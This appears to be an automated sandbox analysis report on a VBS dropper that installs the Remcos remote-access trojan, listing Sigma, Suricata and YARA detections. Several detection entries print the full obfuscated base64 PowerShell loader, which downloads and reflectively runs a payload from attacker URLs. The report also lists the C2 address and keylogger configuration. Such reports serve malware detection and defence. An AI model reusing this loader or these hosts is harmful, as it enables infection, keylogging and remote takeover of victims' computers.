MDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNiku
                  Sigma detected: PowerShell Base64 Encoded Invoke Keyword
                  Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNiku
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", ProcessId: 7808, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNiku
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\5fKvwnCAeC.vbs", ProcessId: 7808, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNiku

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: Registry Key setAuthor: Joe Security: Data: Details: B4 3D DD D1 91 B0 DF CC FB 95 F6 2E 53 37 48 40 98 D2 05 4C 75 58 AB 79 F1 76 B7 EE DC 24 90 16 0A D8 D8 04 61 CC 41 2E AB 49 20 6E A3 7F 5E D8 D7 08 E5 34 45 93 AC E7 03 C0 1F EF 25 8A 6D B3 4E 09 88 35 56 DA 3E BA 49 A0 77 E9 E2 4C 1F C3 B6 5A 68 F4 78 72 B9 A7 2B 6B 60 17 2C D7 B9 45 01 31 01 95 E2 79 03 38 AB FD 5A 91 10 74 24 2B 4F 86 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 7048, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-O0U3JA\exepath

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T05:29:27.935861+020020204231Exploit Kit Activity Detected45.90.89.12380192.168.2.1049707TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T05:29:27.935861+020020204251Exploit Kit Activity Detected45.90.89.12380192.168.2.1049707TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-02T05:29:12.457573+020020365941Malware Command and Control Activity Detected192.168.2.106090145.90.89.988243TCP
                  2024-10-02T05:29:50.329695+020020365941Malware Command and Control Activity Detected192.168.2.104970845.90.89.988243TCP
                  2024-10-02T05:30:12.684380+020020365941Malware Command and Control Activity Detected192.168.2.104971345.90.89.988243TCP
                  2024-10-02T05:30:35.061345+020020365941Malware Command and Control Activity Detected192.168.2.106089845.90.89.988243TCP
                  2024-10-02T05:30:57.500976+020020365941Malware Command and Control Activity Detected192.168.2.106089945.90.89.988243TCP
                  2024-10-02T05:31:19.894305+020020365941Malware Command and Control Activity Detected192.168.2.106090045.90.89.988243TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "45.90.89.98:8243:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for domain / URL
                  Source: https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVirustotal: Detection: 10%Perma Link
                  Source: http://45.90.89.123/2117/RMCCF.txtVirustotal: Detection: 14%Perma Link
                  Source: http://45.90.89.123Virustotal: Detection: 13%Perma Link
                  Source: 45.90.89.98Virustotal: Detection: 12%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: 5fKvwnCAeC.vbsVirustotal: Detection: 9%Perma Link
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,11_2_004338C8
                  Source: powershell.exe, 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4395ad51-c

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1404922826.0000026F3D897000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7484, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7048, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407538 _wcslen,CoGetObject,11_2_00407538
                  Source: unknownHTTPS traffic detected: 207.241.227.240:443 -> 192.168.2.10:49706 version: TLS 1.2
                  Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 0000000A.00000002.1404922826.0000026F3E840000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1436384107.0000026F45F00000.00000004.08000000.00040000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,11_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,11_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,11_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407877 FindFirstFileW,FindNextFileW,11_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044E8F9 FindFirstFileExA,11_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,11_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,11_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,11_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,11_2_00407CD2

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.10:49708 -> 45.90.89.98:8243
